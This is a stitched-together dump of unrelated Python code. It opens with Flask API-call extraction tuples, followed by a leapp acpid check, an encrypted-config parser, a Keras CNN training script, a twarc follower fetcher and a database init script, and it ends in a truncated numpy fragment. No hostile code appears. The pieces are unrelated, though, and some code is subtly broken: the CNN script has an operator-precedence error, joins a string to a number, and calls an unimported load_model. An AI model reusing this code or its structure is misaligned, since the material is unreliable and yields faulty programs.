url_for\n'), ((7805, 7849), 'flask.render_template', 'render_template', (['"""keyword.html"""'], {'entry': 'entry'}), "('keyword.html', entry=entry)\n", (7820, 7849), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for\n'), ((8437, 8450), 'flask.redirect', 'redirect', (['"""/"""'], {}), "('/')\n", (8445, 8450), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for\n'), ((9577, 9621), 're.sub', 're.sub', (['keyword_re', 'replace_keyword', 'content'], {}), '(keyword_re, replace_keyword, content)\n', (9583, 9621), False, 'import re\n'), ((9635, 9654), 'html.escape', 'html.escape', (['result'], {}), '(result)\n', (9646, 9654), False, 'import html\n'), ((10389, 10433), 'urllib.parse.urlencode', 'urllib.parse.urlencode', (["{'keyword': keyword}"], {}), "({'keyword': keyword})\n", (10411, 10433), False, 'import urllib\n'), ((907, 946), 'os.environ.get', 'os.environ.get', (['"""ISUDA_DB_PORT"""', '"""3306"""'], {}), "('ISUDA_DB_PORT', '3306')\n", (921, 946), False, 'import os\n'), ((1844, 1869), 'flask.request.isuda_db.cursor', 'request.isuda_db.cursor', ([], {}), '()\n', (1867, 1869), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for\n'), ((2625, 2651), 'flask.request.isutar_db.cursor', 'request.isutar_db.cursor', ([], {}), '()\n', (2649, 2651), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for\n'), ((2918, 2936), 'flask.request.db.close', 'request.db.close', ([], {}), '()\n', (2934, 2936), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for\n'), ((4206, 4235), 'flask.request.args.get', 'request.args.get', (['"""page"""', '"""1"""'], {}), "('page', '1')\n", (4222, 4235), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for\n'), ((4685, 4720), 'math.ceil', 'math.ceil', (['(total_entries / PER_PAGE)'], {}), '(total_entries / PER_PAGE)\n', (4694, 4720), False, 'import math\n'), ((5190, 5200), 'flask.abort', 'abort', (['(400)'], {}), '(400)\n', (5195, 5200), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for\n'), ((5453, 5463), 'flask.abort', 'abort', (['(400)'], {}), '(400)\n', (5458, 5463), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for\n'), ((6177, 6187), 'flask.abort', 'abort', (['(400)'], {}), '(400)\n', (6182, 6187), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for\n'), ((7239, 7249), 'flask.abort', 'abort', (['(403)'], {}), '(403)\n', (7244, 7249), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for\n'), ((7512, 7522), 'flask.abort', 'abort', (['(400)'], {}), '(400)\n', (7517, 7522), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for\n'), ((7682, 7692), 'flask.abort', 'abort', (['(404)'], {}), '(404)\n', (7687, 7692), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for\n'), ((8040, 8050), 'flask.abort', 'abort', (['(400)'], {}), '(400)\n', (8045, 8050), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for\n'), ((8345, 8355), 'flask.abort', 'abort', (['(404)'], {}), '(404)\n', (8350, 8355), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for\n'), ((9705, 9739), 'flask.url_for', 'url_for', (['"""get_keyword"""'], {'keyword': 'kw'}), "('get_keyword', keyword=kw)\n", (9712, 9739), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for\n'), ((9879, 9895), 're.compile', 're.compile', (['"""\n"""'], {}), "('\\n')\n", (9889, 9895), False, 'import re\n'), ((10443, 10487), 'urllib.request.urlopen', 'urllib.request.urlopen', (["(url + '?%s' % params)"], {}), "(url + '?%s' % params)\n", (10465, 10487), False, 'import urllib\n'), ((3697, 3707), 'flask.abort', 'abort', (['(403)'], {}), '(403)\n', (3702, 3707), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for\n'), ((6709, 6760), 'random.choice', 'random.choice', (['(string.ascii_letters + string.digits)'], {}), '(string.ascii_letters + string.digits)\n', (6722, 6760), False, 'import random\n'), ((9828, 9844), 're.compile', 're.compile', (['hash'], {}), '(hash)\n', (9838, 9844), False, 'import re\n'), ((3419, 3429), 'flask.abort', 'abort', (['(403)'], {}), '(403)\n', (3424, 3429), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for\n'), ((9787, 9802), 'html.escape', 'html.escape', (['kw'], {}), '(kw)\n', (9798, 9802), False, 'import html\n'), ((343, 365), 'pathlib.Path', 'pathlib.Path', (['__file__'], {}), '(__file__)\n', (355, 365), False, 'import pathlib\n'), ((2211, 2256), 'os.environ.get', 'os.environ.get', (['"""ISUTAR_DB_HOST"""', '"""localhost"""'], {}), "('ISUTAR_DB_HOST', 'localhost')\n", (2225, 2256), False, 'import os\n'), ((2345, 2385), 'os.environ.get', 'os.environ.get', (['"""ISUTAR_DB_USER"""', '"""root"""'], {}), "('ISUTAR_DB_USER', 'root')\n", (2359, 2385), False, 'import os\n'), ((2409, 2449), 'os.environ.get', 'os.environ.get', (['"""ISUTAR_DB_PASSWORD"""', '""""""'], {}), "('ISUTAR_DB_PASSWORD', '')\n", (2423, 2449), False, 'import os\n'), ((9019, 9031), 're.escape', 're.escape', (['k'], {}), '(k)\n', (9028, 9031), False, 'import re\n'), ((10669, 10713), 'urllib.parse.urlencode', 'urllib.parse.urlencode', (["{'content': content}"], {}), "({'content': content})\n", (10691, 10713), False, 'import urllib\n'), ((2282, 2322), 'os.environ.get', 'os.environ.get', (['"""ISUTAR_DB_PORT"""', '"""3306"""'], {}), "('ISUTAR_DB_PORT', '3306')\n", (2296, 2322), False, 'import os\n')] |
from leapp.actors import Actor
from leapp.models import InstalledRedHatSignedRPM
from leapp.libraries.common.rpms import has_package
from leapp.reporting import Report, create_report
from leapp import reporting
from leapp.tags import ChecksPhaseTag, IPUWorkflowTag
class CheckAcpid(Actor):
"""
Check if acpid is installed. If yes, write information about non-compatible changes.
"""
name = 'checkacpid'
consumes = (InstalledRedHatSignedRPM,)
produces = (Report,)
tags = (ChecksPhaseTag, IPUWorkflowTag)
def process(self):
if has_package(InstalledRedHatSignedRPM, 'acpid'):
create_report([
reporting.Title('Acpid incompatible changes in the next major version'),
reporting.Summary('The option -d (debug) no longer implies -f (foreground).'),
reporting.Severity(reporting.Severity.LOW),
reporting.Remediation(
hint='You must now use both options (\'-df\') for the same behavior. Please update '
'your scripts to be compatible with the changes.'),
reporting.Tags([reporting.Tags.KERNEL, reporting.Tags.SERVICES]),
reporting.RelatedResource('package', 'acpid')
])
| [
"leapp.reporting.RelatedResource",
"leapp.reporting.Remediation",
"leapp.reporting.Title",
"leapp.libraries.common.rpms.has_package",
"leapp.reporting.Tags",
"leapp.reporting.Summary",
"leapp.reporting.Severity"
] | [((569, 615), 'leapp.libraries.common.rpms.has_package', 'has_package', (['InstalledRedHatSignedRPM', '"""acpid"""'], {}), "(InstalledRedHatSignedRPM, 'acpid')\n", (580, 615), False, 'from leapp.libraries.common.rpms import has_package\n'), ((661, 732), 'leapp.reporting.Title', 'reporting.Title', (['"""Acpid incompatible changes in the next major version"""'], {}), "('Acpid incompatible changes in the next major version')\n", (676, 732), False, 'from leapp import reporting\n'), ((750, 827), 'leapp.reporting.Summary', 'reporting.Summary', (['"""The option -d (debug) no longer implies -f (foreground)."""'], {}), "('The option -d (debug) no longer implies -f (foreground).')\n", (767, 827), False, 'from leapp import reporting\n'), ((845, 887), 'leapp.reporting.Severity', 'reporting.Severity', (['reporting.Severity.LOW'], {}), '(reporting.Severity.LOW)\n', (863, 887), False, 'from leapp import reporting\n'), ((905, 1067), 'leapp.reporting.Remediation', 'reporting.Remediation', ([], {'hint': '"""You must now use both options (\'-df\') for the same behavior. Please update your scripts to be compatible with the changes."""'}), '(hint=\n "You must now use both options (\'-df\') for the same behavior. Please update your scripts to be compatible with the changes."\n )\n', (926, 1067), False, 'from leapp import reporting\n'), ((1126, 1190), 'leapp.reporting.Tags', 'reporting.Tags', (['[reporting.Tags.KERNEL, reporting.Tags.SERVICES]'], {}), '([reporting.Tags.KERNEL, reporting.Tags.SERVICES])\n', (1140, 1190), False, 'from leapp import reporting\n'), ((1208, 1253), 'leapp.reporting.RelatedResource', 'reporting.RelatedResource', (['"""package"""', '"""acpid"""'], {}), "('package', 'acpid')\n", (1233, 1253), False, 'from leapp import reporting\n')] |
from crypto_config import (ConfigParser, ParsingError, Crypt)
import re
class CryptoConfigParser(ConfigParser):
def __init__(self, *args, **kwargs):
key = kwargs.pop('crypt_key', None)
if key != None:
self.crypt_key = key
else:
self.crypt_key = None
ConfigParser.__init__(self, *args, **kwargs)
def get(self, section, option, *args, **kwargs):
raw_val = ConfigParser.get(self, section, option, *args, **kwargs)
val = raw_val
encoded_val = re.search(r"enc\((.*)\)", raw_val, re.IGNORECASE)
if encoded_val and self.crypt_key:
val = self._decrypt(encoded_val.group(1), self.crypt_key)
return val
def _decrypt(self, str, key):
c = Crypt(key)
b_decoded = c.decrypt(str)
return b_decoded | [
"crypto_config.ConfigParser.__init__",
"crypto_config.Crypt",
"crypto_config.ConfigParser.get",
"re.search"
] | [((314, 358), 'crypto_config.ConfigParser.__init__', 'ConfigParser.__init__', (['self', '*args'], {}), '(self, *args, **kwargs)\n', (335, 358), False, 'from crypto_config import ConfigParser, ParsingError, Crypt\n'), ((431, 487), 'crypto_config.ConfigParser.get', 'ConfigParser.get', (['self', 'section', 'option', '*args'], {}), '(self, section, option, *args, **kwargs)\n', (447, 487), False, 'from crypto_config import ConfigParser, ParsingError, Crypt\n'), ((532, 582), 're.search', 're.search', (['"""enc\\\\((.*)\\\\)"""', 'raw_val', 're.IGNORECASE'], {}), "('enc\\\\((.*)\\\\)', raw_val, re.IGNORECASE)\n", (541, 582), False, 'import re\n'), ((761, 771), 'crypto_config.Crypt', 'Crypt', (['key'], {}), '(key)\n', (766, 771), False, 'from crypto_config import ConfigParser, ParsingError, Crypt\n')] |
import os.path
import scipy.io as sio
import numpy as np # for algebraic operations, matrices
import keras.models
from keras.models import Sequential
from keras.layers.core import Dense, Activation, Flatten, Dropout # , Layer, Flatten
# from keras.layers import containers
from keras.models import model_from_json,Model
from sklearn.model_selection import GridSearchCV
from keras.wrappers.scikit_learn import KerasClassifier
from hyperas.distributions import choice, uniform, conditional
from hyperopt import Trials, STATUS_OK
from sklearn.metrics import confusion_matrix
from keras.layers.normalization import BatchNormalization
from keras.layers.convolutional import Conv2D
from keras.layers.convolutional import MaxPooling2D as pool2
from keras.callbacks import EarlyStopping,ModelCheckpoint
# from keras.layers.convolutional import ZeroPadding2D as zero2d
from keras.regularizers import l2 # , activity_l2
# from theano import functionfrom keras.applications.vgg16 import VGG16
from keras.applications.vgg16 import VGG16
from keras.preprocessing import image
from keras.applications.vgg16 import preprocess_input
from keras.optimizers import SGD
from keras.layers.merge import concatenate
from keras.layers import Input,add
from keras.layers.advanced_activations import PReLU,ELU
from keras.layers.pooling import GlobalAveragePooling2D
#temp/Inception-ResNet for 180180
def create180180Model(patchSize):
seed=5
np.random.seed(seed)
input=Input(shape=(1,patchSize[0, 0], patchSize[0, 1]))
out1=Conv2D(filters=64,kernel_size=(3,3),kernel_initializer='he_normal',weights=None,padding='valid',strides=(1, 1),kernel_regularizer=l2(1e-6),activation='relu')(input)
out2=Conv2D(filters=64,kernel_size=(3,3),kernel_initializer='he_normal',weights=None,padding='valid',strides=(1, 1),kernel_regularizer=l2(1e-6),activation='relu')(out1)
out2=pool2(pool_size=(2,2),data_format='channels_first')(out2)
out3=Conv2D(filters=64,kernel_size=(3,3),kernel_initializer='he_normal',weights=None,padding='same',strides=(1, 1),kernel_regularizer=l2(1e-6),activation='relu')(out2)
out4=Conv2D(filters=64,kernel_size=(3,3),kernel_initializer='he_normal',weights=None,padding='same',strides=(1, 1),kernel_regularizer=l2(1e-6),activation='relu')(out3)
out4=add([out2,out4])
out4=pool2(pool_size=(2,2),data_format='channels_first')(out4)
out_3=Conv2D(filters=128,kernel_size=(3,3),kernel_initializer='he_normal',weights=None,padding='same',strides=(1, 1),kernel_regularizer=l2(1e-6),activation='relu')(out4)
out_4=Conv2D(filters=128,kernel_size=(3,3),kernel_initializer='he_normal',weights=None,padding='same',strides=(1, 1),kernel_regularizer=l2(1e-6),activation='relu')(out_3)
out5_1=Conv2D(filters=32,kernel_size=(1,1),kernel_initializer='he_normal',weights=None,padding='same',strides=(1, 1),kernel_regularizer=l2(1e-6),activation='relu')(out_4)
out5_2=Conv2D(filters=32,kernel_size=(1,1),kernel_initializer='he_normal',weights=None,padding='same',strides=(1, 1),kernel_regularizer=l2(1e-6),activation='relu')(out_4)
out5_2=Conv2D(filters=128,kernel_size=(3,3),kernel_initializer='he_normal',weights=None,padding='same',strides=(1, 1),kernel_regularizer=l2(1e-6),activation='relu')(out5_2)
out5_3=Conv2D(filters=32,kernel_size=(1,1),kernel_initializer='he_normal',weights=None,padding='same',strides=(1, 1),kernel_regularizer=l2(1e-6),activation='relu')(out_4)
out5_3=Conv2D(filters=128,kernel_size=(5,5),kernel_initializer='he_normal',weights=None,padding='same',strides=(1, 1),kernel_regularizer=l2(1e-6),activation='relu')(out5_3)
out5_4=pool2(pool_size=(3,3),strides=(1,1),padding='same',data_format='channels_first')(out_4)
out5_4=Conv2D(filters=128,kernel_size=(1,1),kernel_initializer='he_normal',weights=None,padding='same',strides=(1, 1),kernel_regularizer=l2(1e-6),activation='relu')(out5_4)
out5=concatenate(inputs=[out5_1,out5_2,out5_3],axis=1)
out7=Conv2D(filters=288,kernel_size=(3,3),kernel_initializer='he_normal',weights=None,padding='same',strides=(1, 1),kernel_regularizer=l2(1e-6),
activation='relu')(out5)
out7=add([out5, out7])
out7=pool2(pool_size=(2,2),data_format='channels_first')(out7)
sout7=Conv2D(filters=256,kernel_size=(3,3),kernel_initializer='he_normal',weights=None,padding='same',strides=(1, 1),kernel_regularizer=l2(1e-6),
activation='relu')(out7)
out8=Conv2D(filters=256,kernel_size=(3,3),kernel_initializer='he_normal',weights=None,padding='same',strides=(1, 1),kernel_regularizer=l2(1e-6),
activation='relu')(out7)
out9=Conv2D(filters=256,kernel_size=(3,3),kernel_initializer='he_normal',weights=None,padding='same',strides=(1, 1),kernel_regularizer=l2(1e-6),
activation='relu')(out8)
out9=add([sout7, out9])
out9=pool2(pool_size=(2,2),data_format='channels_first')(out9)
out10=Flatten()(out9)
out11=Dense(units=11,
kernel_initializer='normal',
kernel_regularizer='l2',
activation='softmax')(out10)
cnn = Model(inputs=input,outputs=out11)
return cnn
def fTrain(X_train, y_train, X_test, y_test, sOutPath, patchSize, batchSizes=None, learningRates=None, iEpochs=None):
# grid search on batch_sizes and learning rates
# parse inputs
batchSizes = 64 if batchSizes is None else batchSizes
learningRates = 0.01 if learningRates is None else learningRates
iEpochs = 300 if iEpochs is None else iEpochs
for iBatch in batchSizes:
for iLearn in learningRates:
fTrainInner(X_train, y_train, X_test, y_test, sOutPath, patchSize, iBatch, iLearn, iEpochs)
def fTrainInner(X_train, y_train, X_test, y_test, sOutPath, patchSize, batchSize=None, learningRate=None, iEpochs=None):
# parse inputs
batchSize = 64 if batchSize is None else batchSize
learningRate = 0.01 if learningRate is None else learningRate
iEpochs = 300 if iEpochs is None else iEpochs
print('Training CNN InceptionNet')
print('with lr = ' + str(learningRate) + ' , batchSize = ' + str(batchSize))
# save names
_, sPath = os.path.splitdrive(sOutPath)
sPath, sFilename = os.path.split(sPath)
sFilename, sExt = os.path.splitext(sFilename)
model_name = sPath + '/' + sFilename + str(patchSize[0, 0]) + str(patchSize[0, 1]) + '_lr_' + str(
learningRate) + '_bs_' + str(batchSize)
weight_name = model_name + '_weights.h5'
model_json = model_name + '_json'
model_all = model_name + '_model.h5'
model_mat = model_name + '.mat'
if (os.path.isfile(model_mat)): # no training if output file exists
return
# create model
if (patchSize[0,0]!=180 & patchSize[0,1]!=180):
print('NO model for patch size ' + patchSize[0, 0] + patchSize[0, 0])
else:
cnn = create180180Model(patchSize)
# opti = SGD(lr=learningRate, momentum=1e-8, decay=0.1, nesterov=True);#Adag(lr=0.01, epsilon=1e-06)
opti = keras.optimizers.Adam(lr=learningRate, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0)
callbacks = [EarlyStopping(monitor='val_loss', patience=20, verbose=1), ModelCheckpoint(filepath=model_name+'bestweights.hdf5',monitor='val_acc',verbose=0,save_best_only=True,save_weights_only=False)]
#callbacks = [ModelCheckpoint(filepath=model_name+'bestweights.hdf5',monitor='val_acc',verbose=0,save_best_only=True,save_weights_only=False)]
cnn.compile(loss='categorical_crossentropy', optimizer=opti, metrics=['accuracy'])
cnn.summary()
result = cnn.fit(X_train,
y_train,
validation_data=[X_test, y_test],
epochs=iEpochs,
batch_size=batchSize,
callbacks=callbacks,
verbose=1)
score_test, acc_test = cnn.evaluate(X_test, y_test, batch_size=batchSize )
prob_test = cnn.predict(X_test, batchSize, 0)
y_pred=np.argmax(prob_test,axis=1)
y_test=np.argmax(y_test,axis=1)
confusion_mat=confusion_matrix(y_test,y_pred)
# save model
json_string = cnn.to_json()
open(model_json, 'w').write(json_string)
# wei = cnn.get_weights()
cnn.save_weights(weight_name, overwrite=True)
# cnn.save(model_all) # keras > v0.7
# matlab
acc = result.history['acc']
loss = result.history['loss']
val_acc = result.history['val_acc']
val_loss = result.history['val_loss']
print('Saving results: ' + model_name)
sio.savemat(model_name, {'model_settings': model_json,
'model': model_all,
'weights': weight_name,
'acc': acc,
'loss': loss,
'val_acc': val_acc,
'val_loss': val_loss,
'score_test': score_test,
'acc_test': acc_test,
'prob_test': prob_test,
'confusion_mat':confusion_mat})
def fPredict(X_test, y_test, model_name, sOutPath, patchSize, batchSize):
weight_name = model_name[0]
#model_json = model_name[1] + '_json'
#model_all = model_name[0] + '.hdf5'
_, sPath = os.path.splitdrive(sOutPath)
sPath, sFilename = os.path.split(sOutPath)
#sFilename, sExt = os.path.splitext(sFilename)
#f = h5py.File(weight_name, 'r+')
#del f['optimizer_weights']
#f.close()
model=load_model(weight_name)
opti = keras.optimizers.Adam(lr=0.0001, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0)
callbacks = [EarlyStopping(monitor='val_loss', patience=10, verbose=1)]
#model.compile(loss='categorical_crossentropy', optimizer=opti, metrics=['accuracy'])
#model.load_weights(weight_name)
model.summary();
score_test, acc_test = model.evaluate(X_test, y_test, batch_size=batchSize)
prob_pre = model.predict(X_test, batchSize, 0)
y_pred=np.argmax(prob_pre,axis=1)
y_test=np.argmax(y_test,axis=1)
confusion_mat=confusion_matrix(y_test,y_pred)
# modelSave = model_name[:-5] + '_pred.mat'
modelSave = sOutPath + '/' + sFilename + '_result.mat'
sio.savemat(modelSave, {'prob_pre': prob_pre, 'score_test': score_test, 'acc_test': acc_test, 'confusion_mat':confusion_mat})
| [
"keras.layers.core.Flatten",
"scipy.io.savemat",
"keras.callbacks.ModelCheckpoint",
"keras.layers.merge.concatenate",
"keras.layers.add",
"numpy.argmax",
"keras.layers.Input",
"keras.layers.core.Dense",
"keras.regularizers.l2",
"keras.models.Model",
"numpy.random.seed",
"keras.layers.convoluti... | [((1422, 1442), 'numpy.random.seed', 'np.random.seed', (['seed'], {}), '(seed)\n', (1436, 1442), True, 'import numpy as np\n'), ((1450, 1500), 'keras.layers.Input', 'Input', ([], {'shape': '(1, patchSize[0, 0], patchSize[0, 1])'}), '(shape=(1, patchSize[0, 0], patchSize[0, 1]))\n', (1455, 1500), False, 'from keras.layers import Input, add\n'), ((2250, 2267), 'keras.layers.add', 'add', (['[out2, out4]'], {}), '([out2, out4])\n', (2253, 2267), False, 'from keras.layers import Input, add\n'), ((3820, 3872), 'keras.layers.merge.concatenate', 'concatenate', ([], {'inputs': '[out5_1, out5_2, out5_3]', 'axis': '(1)'}), '(inputs=[out5_1, out5_2, out5_3], axis=1)\n', (3831, 3872), False, 'from keras.layers.merge import concatenate\n'), ((4061, 4078), 'keras.layers.add', 'add', (['[out5, out7]'], {}), '([out5, out7])\n', (4064, 4078), False, 'from keras.layers import Input, add\n'), ((4703, 4721), 'keras.layers.add', 'add', (['[sout7, out9]'], {}), '([sout7, out9])\n', (4706, 4721), False, 'from keras.layers import Input, add\n'), ((4966, 5000), 'keras.models.Model', 'Model', ([], {'inputs': 'input', 'outputs': 'out11'}), '(inputs=input, outputs=out11)\n', (4971, 5000), False, 'from keras.models import model_from_json, Model\n'), ((7656, 7684), 'numpy.argmax', 'np.argmax', (['prob_test'], {'axis': '(1)'}), '(prob_test, axis=1)\n', (7665, 7684), True, 'import numpy as np\n'), ((7692, 7717), 'numpy.argmax', 'np.argmax', (['y_test'], {'axis': '(1)'}), '(y_test, axis=1)\n', (7701, 7717), True, 'import numpy as np\n'), ((7732, 7764), 'sklearn.metrics.confusion_matrix', 'confusion_matrix', (['y_test', 'y_pred'], {}), '(y_test, y_pred)\n', (7748, 7764), False, 'from sklearn.metrics import confusion_matrix\n'), ((8151, 8434), 'scipy.io.savemat', 'sio.savemat', (['model_name', "{'model_settings': model_json, 'model': model_all, 'weights': weight_name,\n 'acc': acc, 'loss': loss, 'val_acc': val_acc, 'val_loss': val_loss,\n 'score_test': score_test, 'acc_test': acc_test, 'prob_test': prob_test,\n 'confusion_mat': confusion_mat}"], {}), "(model_name, {'model_settings': model_json, 'model': model_all,\n 'weights': weight_name, 'acc': acc, 'loss': loss, 'val_acc': val_acc,\n 'val_loss': val_loss, 'score_test': score_test, 'acc_test': acc_test,\n 'prob_test': prob_test, 'confusion_mat': confusion_mat})\n", (8162, 8434), True, 'import scipy.io as sio\n'), ((9546, 9573), 'numpy.argmax', 'np.argmax', (['prob_pre'], {'axis': '(1)'}), '(prob_pre, axis=1)\n', (9555, 9573), True, 'import numpy as np\n'), ((9581, 9606), 'numpy.argmax', 'np.argmax', (['y_test'], {'axis': '(1)'}), '(y_test, axis=1)\n', (9590, 9606), True, 'import numpy as np\n'), ((9621, 9653), 'sklearn.metrics.confusion_matrix', 'confusion_matrix', (['y_test', 'y_pred'], {}), '(y_test, y_pred)\n', (9637, 9653), False, 'from sklearn.metrics import confusion_matrix\n'), ((9755, 9885), 'scipy.io.savemat', 'sio.savemat', (['modelSave', "{'prob_pre': prob_pre, 'score_test': score_test, 'acc_test': acc_test,\n 'confusion_mat': confusion_mat}"], {}), "(modelSave, {'prob_pre': prob_pre, 'score_test': score_test,\n 'acc_test': acc_test, 'confusion_mat': confusion_mat})\n", (9766, 9885), True, 'import scipy.io as sio\n'), ((1847, 1900), 'keras.layers.convolutional.MaxPooling2D', 'pool2', ([], {'pool_size': '(2, 2)', 'data_format': '"""channels_first"""'}), "(pool_size=(2, 2), data_format='channels_first')\n", (1852, 1900), True, 'from keras.layers.convolutional import MaxPooling2D as pool2\n'), ((2273, 2326), 'keras.layers.convolutional.MaxPooling2D', 'pool2', ([], {'pool_size': '(2, 2)', 'data_format': '"""channels_first"""'}), "(pool_size=(2, 2), data_format='channels_first')\n", (2278, 2326), True, 'from keras.layers.convolutional import MaxPooling2D as pool2\n'), ((3551, 3641), 'keras.layers.convolutional.MaxPooling2D', 'pool2', ([], {'pool_size': '(3, 3)', 'strides': '(1, 1)', 'padding': '"""same"""', 'data_format': '"""channels_first"""'}), "(pool_size=(3, 3), strides=(1, 1), padding='same', data_format=\n 'channels_first')\n", (3556, 3641), True, 'from keras.layers.convolutional import MaxPooling2D as pool2\n'), ((4085, 4138), 'keras.layers.convolutional.MaxPooling2D', 'pool2', ([], {'pool_size': '(2, 2)', 'data_format': '"""channels_first"""'}), "(pool_size=(2, 2), data_format='channels_first')\n", (4090, 4138), True, 'from keras.layers.convolutional import MaxPooling2D as pool2\n'), ((4729, 4782), 'keras.layers.convolutional.MaxPooling2D', 'pool2', ([], {'pool_size': '(2, 2)', 'data_format': '"""channels_first"""'}), "(pool_size=(2, 2), data_format='channels_first')\n", (4734, 4782), True, 'from keras.layers.convolutional import MaxPooling2D as pool2\n'), ((4795, 4804), 'keras.layers.core.Flatten', 'Flatten', ([], {}), '()\n', (4802, 4804), False, 'from keras.layers.core import Dense, Activation, Flatten, Dropout\n'), ((4820, 4915), 'keras.layers.core.Dense', 'Dense', ([], {'units': '(11)', 'kernel_initializer': '"""normal"""', 'kernel_regularizer': '"""l2"""', 'activation': '"""softmax"""'}), "(units=11, kernel_initializer='normal', kernel_regularizer='l2',\n activation='softmax')\n", (4825, 4915), False, 'from keras.layers.core import Dense, Activation, Flatten, Dropout\n'), ((6843, 6900), 'keras.callbacks.EarlyStopping', 'EarlyStopping', ([], {'monitor': '"""val_loss"""', 'patience': '(20)', 'verbose': '(1)'}), "(monitor='val_loss', patience=20, verbose=1)\n", (6856, 6900), False, 'from keras.callbacks import EarlyStopping, ModelCheckpoint\n'), ((6902, 7039), 'keras.callbacks.ModelCheckpoint', 'ModelCheckpoint', ([], {'filepath': "(model_name + 'bestweights.hdf5')", 'monitor': '"""val_acc"""', 'verbose': '(0)', 'save_best_only': '(True)', 'save_weights_only': '(False)'}), "(filepath=model_name + 'bestweights.hdf5', monitor='val_acc',\n verbose=0, save_best_only=True, save_weights_only=False)\n", (6917, 7039), False, 'from keras.callbacks import EarlyStopping, ModelCheckpoint\n'), ((9212, 9269), 'keras.callbacks.EarlyStopping', 'EarlyStopping', ([], {'monitor': '"""val_loss"""', 'patience': '(10)', 'verbose': '(1)'}), "(monitor='val_loss', patience=10, verbose=1)\n", (9225, 9269), False, 'from keras.callbacks import EarlyStopping, ModelCheckpoint\n'), ((1636, 1645), 'keras.regularizers.l2', 'l2', (['(1e-06)'], {}), '(1e-06)\n', (1638, 1645), False, 'from keras.regularizers import l2\n'), ((1807, 1816), 'keras.regularizers.l2', 'l2', (['(1e-06)'], {}), '(1e-06)\n', (1809, 1816), False, 'from keras.regularizers import l2\n'), ((2041, 2050), 'keras.regularizers.l2', 'l2', (['(1e-06)'], {}), '(1e-06)\n', (2043, 2050), False, 'from keras.regularizers import l2\n'), ((2210, 2219), 'keras.regularizers.l2', 'l2', (['(1e-06)'], {}), '(1e-06)\n', (2212, 2219), False, 'from keras.regularizers import l2\n'), ((2469, 2478), 'keras.regularizers.l2', 'l2', (['(1e-06)'], {}), '(1e-06)\n', (2471, 2478), False, 'from keras.regularizers import l2\n'), ((2640, 2649), 'keras.regularizers.l2', 'l2', (['(1e-06)'], {}), '(1e-06)\n', (2642, 2649), False, 'from keras.regularizers import l2\n'), ((2813, 2822), 'keras.regularizers.l2', 'l2', (['(1e-06)'], {}), '(1e-06)\n', (2815, 2822), False, 'from keras.regularizers import l2\n'), ((2986, 2995), 'keras.regularizers.l2', 'l2', (['(1e-06)'], {}), '(1e-06)\n', (2988, 2995), False, 'from keras.regularizers import l2\n'), ((3159, 3168), 'keras.regularizers.l2', 'l2', (['(1e-06)'], {}), '(1e-06)\n', (3161, 3168), False, 'from keras.regularizers import l2\n'), ((3333, 3342), 'keras.regularizers.l2', 'l2', (['(1e-06)'], {}), '(1e-06)\n', (3335, 3342), False, 'from keras.regularizers import l2\n'), ((3506, 3515), 'keras.regularizers.l2', 'l2', (['(1e-06)'], {}), '(1e-06)\n', (3508, 3515), False, 'from keras.regularizers import l2\n'), ((3777, 3786), 'keras.regularizers.l2', 'l2', (['(1e-06)'], {}), '(1e-06)\n', (3779, 3786), False, 'from keras.regularizers import l2\n'), ((4007, 4016), 'keras.regularizers.l2', 'l2', (['(1e-06)'], {}), '(1e-06)\n', (4009, 4016), False, 'from keras.regularizers import l2\n'), ((4280, 4289), 'keras.regularizers.l2', 'l2', (['(1e-06)'], {}), '(1e-06)\n', (4282, 4289), False, 'from keras.regularizers import l2\n'), ((4465, 4474), 'keras.regularizers.l2', 'l2', (['(1e-06)'], {}), '(1e-06)\n', (4467, 4474), False, 'from keras.regularizers import l2\n'), ((4649, 4658), 'keras.regularizers.l2', 'l2', (['(1e-06)'], {}), '(1e-06)\n', (4651, 4658), False, 'from keras.regularizers import l2\n')] |
from twarc import Twarc2, expansions
import json
# Replace your bearer token below
client = Twarc2(bearer_token="<PASSWORD>")
def main():
# The followers function gets followers for specified user
followers = client.followers(user="twitterdev")
for page in followers:
result = expansions.flatten(page)
for user in result:
# Here we are printing the full Tweet object JSON to the console
print(json.dumps(user))
if __name__ == "__main__":
main()
| [
"twarc.expansions.flatten",
"json.dumps",
"twarc.Twarc2"
] | [((93, 126), 'twarc.Twarc2', 'Twarc2', ([], {'bearer_token': '"""<PASSWORD>"""'}), "(bearer_token='<PASSWORD>')\n", (99, 126), False, 'from twarc import Twarc2, expansions\n'), ((300, 324), 'twarc.expansions.flatten', 'expansions.flatten', (['page'], {}), '(page)\n', (318, 324), False, 'from twarc import Twarc2, expansions\n'), ((448, 464), 'json.dumps', 'json.dumps', (['user'], {}), '(user)\n', (458, 464), False, 'import json\n')] |
#!/usr/bin/env python3
# encoding: utf-8
"""Easily create ../app.db and import ../lemuria.json"""
import asyncio
from db_tools import init_db
from db_tools import import_world
asyncio.run(init_db())
asyncio.run(import_world('../atlemuria.txt', '../proplemuria.txt'))
| [
"db_tools.init_db",
"db_tools.import_world"
] | [((190, 199), 'db_tools.init_db', 'init_db', ([], {}), '()\n', (197, 199), False, 'from db_tools import init_db\n'), ((213, 267), 'db_tools.import_world', 'import_world', (['"""../atlemuria.txt"""', '"""../proplemuria.txt"""'], {}), "('../atlemuria.txt', '../proplemuria.txt')\n", (225, 267), False, 'from db_tools import import_world\n')] |
import numpy as np
import random
import matplotlib.pyplot as plt
from load_data import loadLabel,loadImage
def der_activation_function(x,type):
if type==1:
return 1 - np.power(np.tanh(x), 2)
